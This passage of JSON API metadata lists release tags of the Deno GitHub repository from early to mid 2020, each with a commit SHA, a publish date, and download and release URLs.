no@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/